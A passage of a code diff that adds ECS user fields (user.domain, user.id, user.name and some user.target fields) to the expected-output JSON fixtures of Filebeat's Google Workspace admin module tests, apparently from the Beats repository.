(groupDomain) { + evt.Put("user.target.group.domain", groupDomain); + } }; var setEventDuration = function(evt) { diff --git a/x-pack/filebeat/module/google_workspace/admin/test/admin-application-test.json.log-expected.json b/x-pack/filebeat/module/google_workspace/admin/test/admin-application-test.json.log-expected.json index 6e14b17286f2..abd84e262724 100644 --- a/x-pack/filebeat/module/google_workspace/admin/test/admin-application-test.json.log-expected.json +++ b/x-pack/filebeat/module/google_workspace/admin/test/admin-application-test.json.log-expected.json @@ -55,7 +55,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -112,7 +115,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -169,7 +175,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -224,7 +233,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -275,7 +287,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -325,7 +340,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -375,7 +393,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -426,7 +447,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -476,6 +500,9 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" } ] \ No newline at end of file diff --git a/x-pack/filebeat/module/google_workspace/admin/test/admin-calendar-test.json.log-expected.json b/x-pack/filebeat/module/google_workspace/admin/test/admin-calendar-test.json.log-expected.json index b58fc898aa5d..b2d9d4912151 100644 --- a/x-pack/filebeat/module/google_workspace/admin/test/admin-calendar-test.json.log-expected.json +++ b/x-pack/filebeat/module/google_workspace/admin/test/admin-calendar-test.json.log-expected.json @@ -47,7 +47,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -97,7 +100,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -150,7 +156,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -200,7 +209,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -250,7 +262,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -300,7 +315,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -350,7 +368,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -404,7 +425,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -455,7 +479,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -508,7 +535,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -565,7 +595,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -615,7 +648,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -665,6 +704,12 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" } ] \ No newline at end of file diff --git a/x-pack/filebeat/module/google_workspace/admin/test/admin-chat-test.json.log-expected.json b/x-pack/filebeat/module/google_workspace/admin/test/admin-chat-test.json.log-expected.json index fd36d938cfa4..4caec2adf2df 100644 --- a/x-pack/filebeat/module/google_workspace/admin/test/admin-chat-test.json.log-expected.json +++ b/x-pack/filebeat/module/google_workspace/admin/test/admin-chat-test.json.log-expected.json @@ -46,7 +46,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -95,7 +98,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -145,7 +151,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -202,6 +211,9 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" } ] \ No newline at end of file diff --git a/x-pack/filebeat/module/google_workspace/admin/test/admin-chromeos-test.json.log-expected.json b/x-pack/filebeat/module/google_workspace/admin/test/admin-chromeos-test.json.log-expected.json index be4e9edc5471..f81d96a81f14 100644 --- a/x-pack/filebeat/module/google_workspace/admin/test/admin-chromeos-test.json.log-expected.json +++ b/x-pack/filebeat/module/google_workspace/admin/test/admin-chromeos-test.json.log-expected.json @@ -55,7 +55,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -107,7 +110,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -165,7 +171,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -215,7 +224,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -264,7 +276,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -317,7 +332,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -369,7 +387,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -422,7 +443,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -471,7 +495,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -520,7 +547,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -571,7 +601,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -620,7 +653,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -669,7 +705,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -720,7 +759,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -773,7 +815,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -826,7 +871,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -880,7 +928,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -932,7 +983,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -981,7 +1035,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -1031,7 +1088,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -1085,6 +1145,9 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" } ] \ No newline at end of file diff --git a/x-pack/filebeat/module/google_workspace/admin/test/admin-contacts-test.json.log-expected.json b/x-pack/filebeat/module/google_workspace/admin/test/admin-contacts-test.json.log-expected.json index 7c057be7bfd5..5db40eec65c3 100644 --- a/x-pack/filebeat/module/google_workspace/admin/test/admin-contacts-test.json.log-expected.json +++ b/x-pack/filebeat/module/google_workspace/admin/test/admin-contacts-test.json.log-expected.json @@ -51,6 +51,9 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" } ] \ No newline at end of file diff --git a/x-pack/filebeat/module/google_workspace/admin/test/admin-delegatedadmin-test.json.log-expected.json b/x-pack/filebeat/module/google_workspace/admin/test/admin-delegatedadmin-test.json.log-expected.json index e38c013ed502..608736f71670 100644 --- a/x-pack/filebeat/module/google_workspace/admin/test/admin-delegatedadmin-test.json.log-expected.json +++ b/x-pack/filebeat/module/google_workspace/admin/test/admin-delegatedadmin-test.json.log-expected.json @@ -49,7 +49,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -99,7 +105,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -149,7 +158,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -200,7 +212,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -251,7 +266,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -301,7 +319,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -351,7 +372,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -403,6 +427,12 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" } ] \ No newline at end of file diff --git a/x-pack/filebeat/module/google_workspace/admin/test/admin-docs-test.json.log-expected.json b/x-pack/filebeat/module/google_workspace/admin/test/admin-docs-test.json.log-expected.json index 3d9032bcb6cf..fd8de3b21d11 100644 --- a/x-pack/filebeat/module/google_workspace/admin/test/admin-docs-test.json.log-expected.json +++ b/x-pack/filebeat/module/google_workspace/admin/test/admin-docs-test.json.log-expected.json @@ -49,7 +49,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -102,7 +108,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -159,6 +171,9 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" } ] \ No newline at end of file diff --git a/x-pack/filebeat/module/google_workspace/admin/test/admin-domain-test.json.log-expected.json b/x-pack/filebeat/module/google_workspace/admin/test/admin-domain-test.json.log-expected.json index aedc198aeec8..65e1fe272a7a 100644 --- a/x-pack/filebeat/module/google_workspace/admin/test/admin-domain-test.json.log-expected.json +++ b/x-pack/filebeat/module/google_workspace/admin/test/admin-domain-test.json.log-expected.json @@ -47,7 +47,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -98,7 +101,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -148,7 +154,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -199,7 +208,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -248,7 +260,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -297,7 +312,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -346,7 +364,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -397,7 +418,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -447,7 +471,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -498,7 +525,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -548,7 +578,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -598,7 +631,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -648,7 +684,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -698,7 +737,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -749,7 +791,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -800,7 +845,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -851,7 +899,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -903,7 +954,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -957,7 +1011,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -1007,7 +1064,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -1058,7 +1118,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -1108,7 +1171,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -1158,7 +1224,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -1210,7 +1279,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -1263,7 +1335,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -1314,7 +1389,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -1366,7 +1444,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -1417,7 +1498,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -1466,7 +1550,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -1517,7 +1604,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -1566,7 +1656,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -1617,7 +1710,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -1669,7 +1765,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -1720,7 +1819,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -1769,7 +1871,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -1818,7 +1923,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -1869,7 +1977,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -1920,7 +2031,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -1970,7 +2084,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -2020,7 +2137,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -2071,7 +2191,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -2120,7 +2243,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -2169,7 +2295,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -2220,7 +2349,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -2271,7 +2403,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -2322,7 +2457,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -2373,7 +2511,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -2424,7 +2565,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -2472,7 +2616,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -2523,7 +2670,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -2574,7 +2724,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -2625,7 +2778,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -2675,7 +2831,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -2724,7 +2883,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -2775,7 +2937,13 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "example.com", + "user.target.email": "user@example.com", + "user.target.name": "user" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -2826,7 +2994,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -2877,7 +3048,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -2926,7 +3100,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -2975,7 +3152,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -3026,7 +3206,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -3077,7 +3260,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -3130,7 +3316,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -3181,7 +3370,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -3232,7 +3424,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -3283,7 +3478,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo" }, { "@timestamp": "2020-10-02T15:00:00.000Z", @@ -3335,7 +3533,10 @@ "source.user.name": "foo", "tags": [ "forwarded" - ] + ], + "user.domain": "bar.com", + "user.id": "1", 